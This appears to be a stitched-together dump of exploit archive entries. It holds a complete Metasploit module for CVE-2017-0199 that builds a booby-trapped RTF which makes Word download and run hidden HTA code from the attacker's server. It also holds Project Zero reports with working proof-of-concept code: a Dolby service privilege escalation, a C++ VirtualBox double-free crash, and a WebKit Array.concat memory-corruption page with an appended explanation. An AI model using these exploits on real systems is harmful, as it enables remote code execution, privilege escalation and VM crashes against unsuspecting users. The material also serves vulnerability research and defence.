    )
  end

end
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Hta Execution",
      'Description'    => %q{
        This module creates a malicious RTF file that when opened in
        vulnerable versions of Microsoft Word will lead to code execution.
        The flaw exists in how a olelink object can make a http(s) request,
        and execute hta code in response.

        This bug was originally seen being exploited in the wild starting
        in Oct 2016. This module was created by reversing a public
        malware sample.
      },
      'Author'         =>
        [
          'Haifei Li', # vulnerability analysis
          'ryHanson',
          'wdormann',
          'DidierStevens',
          'vysec',
          'Nixawk', # module developer
          'sinn3r'  # msf module improvement
        ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2017-0199'],
        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
      ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Microsoft Office Word', {} ]
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 14 2017'))

    register_options([
      OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
      OptString.new('URIPATH',  [ true, 'The URI to use for the HTA file', 'default.hta'])
    ], self.class)
  end

  def generate_uri
    uri_maxlength = 112

    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    scheme = datastore['SSL'] ? 'https' : 'http'

    uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
    uri.delete!("\n")
    uri.delete!("\\x")
    uri.delete!("\\")

    padding_length = uri_maxlength * 2 - uri.length
    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
    padding_length.times { uri << "0" }
    uri
  end

  def create_ole_ministream_data
    # require 'rex/ole'
    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
    # ministream = ole.instance_variable_get(:@ministream)
    # ministream_data = ministream.instance_variable_get(:@data)

    ministream_data = ""
    ministream_data << "01000002090000000100000000000000" # 00000000: ................
    ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
    ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
    ministream_data << generate_uri
    ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
    ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
    ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
    ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
    ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
    ministream_data << "00000000000000000000000000000000" # 000000f0: ................
    ministream_data << "100203000d0000000000000000000000" # 00000100: ................
    ministream_data << "00000000000000000000000000000000" # 00000110: ................
    ministream_data << "00000000000000000000000000000000" # 00000120: ................
    ministream_data << "00000000000000000000000000000000" # 00000130: ................
    ministream_data << "00000000000000000000000000000000" # 00000140: ................
    ministream_data << "00000000000000000000000000000000" # 00000150: ................
    ministream_data << "00000000000000000000000000000000" # 00000160: ................
    ministream_data << "00000000000000000000000000000000" # 00000170: ................
    ministream_data << "00000000000000000000000000000000" # 00000180: ................
    ministream_data << "00000000000000000000000000000000" # 00000190: ................
    ministream_data << "00000000000000000000000000000000" # 000001a0: ................
    ministream_data << "00000000000000000000000000000000" # 000001b0: ................
    ministream_data << "00000000000000000000000000000000" # 000001c0: ................
    ministream_data << "00000000000000000000000000000000" # 000001d0: ................
    ministream_data << "00000000000000000000000000000000" # 000001e0: ................
    ministream_data << "00000000000000000000000000000000" # 000001f0: ................
    ministream_data
  end

  def create_rtf_format
    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
    template_rtf = ::File.open(template_path, 'rb')

    data = template_rtf.read(template_rtf.stat.size)
    data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
    template_rtf.close
    data
  end

  def on_request_uri(cli, req)
    p = regenerate_payload(cli)
    data = Msf::Util::EXE.to_executable_fmt(
      framework,
      ARCH_X86,
      'win',
      p.encoded,
      'hta-psh',
      { :arch => ARCH_X86, :platform => 'win' }
    )

    # This allows the HTA window to be invisible
    data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")

    send_response(cli, data, 'Content-Type' => 'application/hta')
  end

  def exploit
    file_create(create_rtf_format)
    super
  end
end
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1075

Windows: Dolby Audio X2 Service Elevation of Privilege
Platform: Windows 10 + Realtek Audio Driver version 6.0.1.7898 (on a Lenovo P50). Version of the service binary 0.7.2.61 built on 7/18/2016.
Class: Elevation of Privilege

Summary:
The DAX2API service installed as part of the Realtek Audio Driver on Windows 10 contains a privilege escalation vulnerability which allows a normal user to gain arbitrary system privileges.

Description:

The DAX2API service is a DCOM service written in .NET running at system privileges. The use of .NET for DCOM is inherently unsafe and should not be used. There’s public exploit code to elevate privileges on arbitrary services available at https://github.com/tyranid/ExploitDotNetDCOM.

Microsoft recommends moving from using DCOM to WCF for .NET services of different privilege levels. See https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/ for more information.

Proof of Concept:

To demonstrate the vulnerability download the project https://github.com/tyranid/ExploitDotNetDCOM and compile using Visual Studio. The executable to use is ExploitDotNetDCOMSerialization.exe.

1) From a command prompt run the command “ExploitDotNetDCOMSerialization.exe 6A28A945-790C-4B68-B0F4-34EEB1626EE3 notepad” 
2) Check the currently running processes for the privileged copy of notepad.

Expected Result:
No privilege escalation occurs.

Observed Result:
An instance of notepad is running at system privileges.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41933.zip
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1227

We have discovered a heap double-free vulnerability in the latest version of VirtualBox (5.1.18), with Guest Additions (and more specifically shared folders) enabled in the guest operating system. The heap memory corruption takes place in the VirtualBox.exe process running on a Windows host (other host platforms were untested). It can be triggered from an unprivileged ring-3 process running in a Windows guest, by performing two nt!NtQueryDirectoryFile system calls [1] against a shared (sub)directory one after another: the first one with the ReturnSingleEntry argument set to FALSE, and the next one with ReturnSingleEntry=TRUE. During the second system call, a double free takes place and the VM execution is aborted.

We have confirmed that the vulnerability reproduces with Windows 7/10 32-bit as the guest, and Windows 7 64-bit as the host system, but haven’t checked other configurations. However, it seems very likely that the specific version of Windows as the guest/host is irrelevant.

It also seems important for reproduction that the shared directory being queried has some files (preferably a few dozen) inside of it. The attached Proof of Concept program (written in C++, can be compiled with Microsoft Visual Studio) works by first creating a dedicated directory in the shared folder (called “vbox_crash”), and then creating 16 files with ~128 byte long names, which appears to be sufficient to always trigger the bug. Finally, it invokes the nt!NtQueryDirectoryFile syscall twice, leading to a VM crash. While the PoC requires write access to the shared folder to set up reliable conditions, it is probably not necessary in practical scenarios, as long as the shared folder already contains some files (which is most often the case).

If we assume that the shared folder is mounted as drive E, we can start the PoC as follows:

>VirtualBoxKiller.exe E:\

Immediately after pressing "enter", the virtual machine should be aborted. The last two lines of the VBoxHardening.log file corresponding to the VM should be similar to the following:

--- cut ---
  3e28.176c: supR3HardNtChildWaitFor[2]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468037 ms, the end);
  1020.3404: supR3HardNtChildWaitFor[1]: Quitting: ExitCode=0xc0000374 (rcNtWait=0x0, rcNt1=0x0, rcNt2=0x103, rcNt3=0x103, 4468638 ms, the end);
--- cut ---

The 0xc0000374 exit code above translates to STATUS_HEAP_CORRUPTION. A summary of the crash and the corresponding stack trace is as follows:

--- cut ---
  1: kd> g
  Critical error detected c0000374
  Break instruction exception - code 80000003 (first chance)
  ntdll!RtlReportCriticalFailure+0x2f:
  0033:00000000`76f3f22f cc              int     3

  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  00000000`76f3f846 : 00000000`00000002 00000000`00000023 00000000`00000087 00000000`00000003 : ntdll!RtlReportCriticalFailure+0x2f
  00000000`76f40412 : 00000000`00001010 00000000`03a50000 00000000`00001000 00000000`00001000 : ntdll!RtlpReportHeapFailure+0x26
  00000000`76f42084 : 00000000`03a50000 00000000`05687df0 00000000`00000000 00000000`038d0470 : ntdll!RtlpHeapHandleError+0x12
  00000000`76eda162 : 00000000`05687de0 00000000`00000000 00000000`00000000 000007fe`efc8388b : ntdll!RtlpLogHeapFailure+0xa4
  00000000`76d81a0a : 00000000`00000000 00000000`03f0e1b0 00000000`111fdd40 00000000`00000000 : ntdll!RtlFreeHeap+0x72
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`08edf790 00000000`05661c00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`03f0e1b0 : MSVCR100!free+0x1c
  000007fe`f4613a96 : 00000000`05661d16 00000000`00000000 00000000`00000000 00000000`05687df0 : VBoxRT+0xc8fef
  000007fe`f4611a48 : 00000000`056676d0 00000000`08edf830 00000000`00000000 00000000`05661c98 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee885c22 : 00000000`111fdd30 00000000`111fdd30 00000000`03f352b0 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee884a2c : 00000000`00000000 00000000`111fdd30 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`05747fe0 00000000`00000da4 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`05737e90 00000000`05737e90 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`05737e90 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`05737e90 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---

When the "Heaps" option is enabled for VirtualBox.exe in Application Verifier, the crash is reported in the following way:

--- cut ---
  1: kd> g

  =======================================
  VERIFIER STOP 0000000000000007: pid 0xC08: Heap block already freed. 

    000000000DCB1000 : Heap handle for the heap owning the block.
    000000001C37E000 : Heap block being freed again.
    0000000000000000 : Size of the heap block.
    0000000000000000 : Not used


  =======================================
  This verifier stop is not continuable. Process will be terminated 
  when you use the `go' debugger command.

  =======================================

  1: kd> kb
  RetAddr           : Args to Child                                                           : Call Site
  000007fe`f42437ee : 00000000`00000000 00000000`1c37e000 000007fe`f42415a8 000007fe`f42520b0 : ntdll!DbgBreakPoint
  000007fe`f4249970 : 00000000`265cf5b8 00000000`00000007 00000000`0dcb1000 00000000`1c37e000 : vrfcore!VerifierStopMessageEx+0x772
  000007fe`f302931d : 00000000`1c186a98 00000000`00000000 00000000`265cf520 00100000`265cf520 : vrfcore!VfCoreRedirectedStopMessage+0x94
  000007fe`f3026bc1 : 00000000`0dcb1000 00000000`1c37e000 00000000`00000000 00000000`0dcb1000 : verifier!AVrfpDphReportCorruptedBlock+0x155
  000007fe`f3026c6f : 00000000`0dcb1000 00000000`1c37e000 00000000`0dcb1000 00000000`00002000 : verifier!AVrfpDphFindBusyMemoryNoCheck+0x71
  000007fe`f3026e45 : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`1717ed08 : verifier!AVrfpDphFindBusyMemory+0x1f
  000007fe`f302870e : 00000000`1c37e000 00000000`00000000 00000000`01001002 00000000`0dcb1038 : verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x25
  00000000`76f440d5 : 00000000`00000000 00000000`00000000 00000000`00001000 00000000`00000000 : verifier!AVrfDebugPageHeapFree+0x8a
  00000000`76ee796c : 00000000`0dcb0000 00000000`00000000 00000000`0dcb0000 00000000`00000000 : ntdll!RtlDebugFreeHeap+0x35
  00000000`76d81a0a : 00000000`0dcb0000 000007fe`efc41b01 00000000`00000000 00000000`1c37e000 : ntdll! ?? ::FNODOBFM::`string'+0xe982
  00000000`725a8d94 : 00000000`00000087 000007fe`efc3919b 00000000`265cfb10 00000000`1c341f00 : kernel32!HeapFree+0xa
  000007fe`efc58fef : 00000000`00000086 00000000`00001000 00000000`00000000 00000000`67e40fe0 : MSVCR100!free+0x1c
  000007fe`f4923a96 : 00000000`1c342076 00000000`00000000 00000000`00000000 00000000`1c37e000 : VBoxRT+0xc8fef
  000007fe`f4921a48 : 00000000`5c774ff0 00000000`265cfbb0 00000000`00000000 00000000`1c341ff8 : VBoxSharedFolders!VBoxHGCMSvcLoad+0x1686
  000007fe`ee595c22 : 00000000`63097f60 00000000`63097f60 00000000`25f81f30 00000000`0000018c : VBoxSharedFolders+0x1a48
  000007fe`ee594a2c : 00000000`00000000 00000000`63097f60 00000000`00000000 00000000`00000000 : VBoxC!VBoxDriversRegister+0x48c62
  000007fe`efc13b2f : 00000000`25339730 00000000`000004c8 00000000`00000000 00000000`1dce4d30 : VBoxC!VBoxDriversRegister+0x47a6c
  000007fe`efc91122 : 00000000`1dce4d30 00000000`1dce4d30 00000000`00000000 00000000`00000000 : VBoxRT+0x83b2f
  00000000`72561d9f : 00000000`1dce4d30 00000000`00000000 00000000`00000000 00000000`00000000 : VBoxRT+0x101122
  00000000`72561e3b : 00000000`725f2ac0 00000000`1dce4d30 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0x43
  00000000`76d759bd : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : MSVCR100!endthreadex+0xdf
  00000000`76eaa2e1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
  00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
--- cut ---

Because the flaw is heap memory corruption (the trace above shows the double free being caught by Application Verifier inside the host-side VBoxSharedFolders service), it could potentially let an unprivileged guest program escape the VM and execute arbitrary code on the host, so we consider it a high-severity issue.

References:
[1] ZwQueryDirectoryFile routine, https://msdn.microsoft.com/en-us/library/windows/hardware/ff567047(v=vs.85).aspx
*/

#include <Windows.h>
#include <winternl.h>

#include <cstdio>
#include <time.h>

// NtQueryDirectoryFile is exported by ntdll.dll but not declared in winternl.h,
// so it is declared below; pull in the import library so the call links (MSVC).
#pragma comment(lib, "ntdll.lib")

extern "C"
NTSTATUS WINAPI NtQueryDirectoryFile(
  _In_     HANDLE                 FileHandle,
  _In_opt_ HANDLE                 Event,
  _In_opt_ PIO_APC_ROUTINE        ApcRoutine,
  _In_opt_ PVOID                  ApcContext,
  _Out_    PIO_STATUS_BLOCK       IoStatusBlock,
  _Out_    PVOID                  FileInformation,
  _In_     ULONG                  Length,
  _In_     FILE_INFORMATION_CLASS FileInformationClass,
  _In_     BOOLEAN                ReturnSingleEntry,
  _In_opt_ PUNICODE_STRING        FileName,
  _In_     BOOLEAN                RestartScan
);

typedef struct _FILE_DIRECTORY_INFORMATION {
  ULONG         NextEntryOffset;
  ULONG         FileIndex;
  LARGE_INTEGER CreationTime;
  LARGE_INTEGER LastAccessTime;
  LARGE_INTEGER LastWriteTime;
  LARGE_INTEGER ChangeTime;
  LARGE_INTEGER EndOfFile;
  LARGE_INTEGER AllocationSize;
  ULONG         FileAttributes;
  ULONG         FileNameLength;
  WCHAR         FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;

int main(int argc, char **argv) {
  // Validate command line format.
  if (argc != 2) {
    printf("Usage: %s <path to a writable shared folder>\n", argv[0]);
    return 1;
  }

  // Initialize the PRNG.
  srand((unsigned int)time(NULL));

  // Create a subdirectory dedicated to demonstrating the vulnerability.
  CHAR TmpDirectoryName[MAX_PATH];
  _snprintf_s(TmpDirectoryName, sizeof(TmpDirectoryName), "%s\\vbox_crash", argv[1]);

  if (!CreateDirectoryA(TmpDirectoryName, NULL) && GetLastError() != ERROR_ALREADY_EXISTS) {
    printf("CreateDirectory failed, %lu\n", GetLastError());
    return 1;
  }

  // Create 16 files with long (128-byte) names, which appears to always be sufficient to trigger the bug.
  CONST UINT kTempFilesCount = 16;
  CONST UINT kTempFilenameLength = 128;
  CHAR TmpFilename[kTempFilenameLength + 1], TmpFilePath[MAX_PATH];

  memset(TmpFilename, 'A', kTempFilenameLength);
  TmpFilename[kTempFilenameLength] = '\0';

  for (UINT i = 0; i < kTempFilesCount; i++) {
    _snprintf_s(TmpFilePath, sizeof(TmpFilePath), "%s\\%s.%u", TmpDirectoryName, TmpFilename, rand());
    HANDLE hFile = CreateFileA(TmpFilePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
      printf("CreateFile#1 failed, %lu\n", GetLastError());
      return 1;
    }

    CloseHandle(hFile);
  }
  
  // Open the temporary directory.
  HANDLE hDirectory = CreateFileA(TmpDirectoryName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
  if (hDirectory == INVALID_HANDLE_VALUE) {
    printf("CreateFile#2 failed, %lu\n", GetLastError());
    return 1;
  }

  IO_STATUS_BLOCK iosb;
  FILE_DIRECTORY_INFORMATION fdi;

  // Perform the first call, with ReturnSingleEntry set to FALSE. The return
  // statuses of both calls are deliberately ignored: what matters is how the
  // host-side shared folders service handles this pair of requests, not what
  // the guest gets back.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, FALSE, NULL, TRUE);

  // Now make the same call, but with ReturnSingleEntry=TRUE. This should crash VirtualBox.exe on the host with a double-free exception.
  NtQueryDirectoryFile(hDirectory, NULL, NULL, NULL, &iosb, &fdi, sizeof(fdi), FileDirectoryInformation, TRUE, NULL, TRUE);

  // We should never reach here.
  CloseHandle(hDirectory);

  return 0;
}
            
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095

There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.

In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:

unsigned newLength = startIndex + otherLength;

Both operands are 32-bit unsigned, so if startIndex (resultIndex from concatSlowPath in JS) is very large the addition wraps around: newLength comes out smaller than startIndex, too small a buffer is allocated, and the copy lands outside it.

Reaching this state should be expensive, because an array of length resultIndex has to be allocated and copied before resultIndex is incremented. However, if both arrays involved in the concatenation are of type ArrayWithUndecided, JSArray::appendMemcpy returns true without copying, so resultIndex can be advanced to a very large value cheaply.

Arrays of type ArrayWithUndecided are usually of length 0. It is possible to create a longer one, however, by calling Array.splice on an array whose elements are all undefined: an undecided array of the delete length is allocated and returned without ever being written to (a write would force it to decide its type).

A minimal PoC is as follows; the full PoC (the HTML page below) is attached.

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);
-->

<html>
<body>
<script>

var a = [];
a.length = 0xffffff00;

var b = a.splice(0, 0x100000); // Undecided array

var args = [];
args.length = 4094;
args.fill(b);

var q = [];
q.length = 0x1000;
q.fill(7);

var c = a.splice(0, 0xfffef); //Shorter undecided array

args[4094] = c;
args[4095] = q;


b.concat.apply(b, args);

</script>
</body>
</html>
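The length arithmetic the report describes, worked through with the PoC's own constants, as an added example that is not part of the Project Zero report or of WebKit's code. It represents each array only by its length and assumes that concatSlowPath appends the receiver first and then each argument in order, advancing resultIndex by each length; the checked variant is illustrative hardening, not WebKit's actual patch.

```javascript
// Added example (not from the report or WebKit): models only the length
// arithmetic of JSArray::appendMemcpy for the concat call in the PoC, with
// each array represented by its length. Assumption: concatSlowPath processes
// the receiver first, then the arguments in order, advancing resultIndex.

// Mimics `unsigned newLength = startIndex + otherLength;`: the sum is
// truncated to 32 bits, exactly as the C++ unsigned addition wraps.
function appendMemcpyNewLength(startIndex, otherLength) {
  return (startIndex + otherLength) >>> 0;
}

// Overflow-safe variant (illustrative hardening, not WebKit's fix): returns
// null when the 32-bit sum would wrap, so a caller can bail out instead of
// sizing the destination buffer from a wrapped length.
function appendMemcpyNewLengthChecked(startIndex, otherLength) {
  const sum = startIndex + otherLength; // exact in a double below 2^53
  return sum > 0xffffffff ? null : sum;
}

// Walk the receiver and arguments, returning the first step at which the
// wrapped newLength is smaller than the running resultIndex (where the real
// code would allocate an undersized buffer), or null if no step wraps.
function findOverflowStep(receiverLength, argLengths) {
  let resultIndex = receiverLength;
  for (let i = 0; i < argLengths.length; i++) {
    const newLength = appendMemcpyNewLength(resultIndex, argLengths[i]);
    if (newLength < resultIndex) {
      return { step: i, startIndex: resultIndex, otherLength: argLengths[i], newLength };
    }
    resultIndex = newLength;
  }
  return null;
}

// Lengths taken from the PoC: b (0x100000 elements, undecided) is the
// receiver; args holds 4094 copies of b, then c (0xfffef, undecided), then
// q (0x1000 integers). Only the append of q performs a real copy.
function pocArgLengths() {
  const lengths = new Array(4094).fill(0x100000);
  lengths.push(0xfffef, 0x1000);
  return lengths;
}

// Walking the PoC: 4095 * 0x100000 + 0xfffef = 0xffffffef, and adding q's
// 0x1000 wraps to 0xfef, so the destination is sized for 0xfef elements
// while the copy of q begins at index 0xffffffef.
const overflow = findOverflowStep(0x100000, pocArgLengths());
if (overflow) {
  console.log("wrap at arg", overflow.step,
              "startIndex 0x" + overflow.startIndex.toString(16),
              "newLength 0x" + overflow.newLength.toString(16));
}
```

The undecided arrays are what make the walk cheap: every step except the last returns without copying, so resultIndex reaches 0xffffffef in well under a second, and only the final append of q (a real ArrayWithInt32 of 0x1000 elements) triggers the copy at a wrapped length.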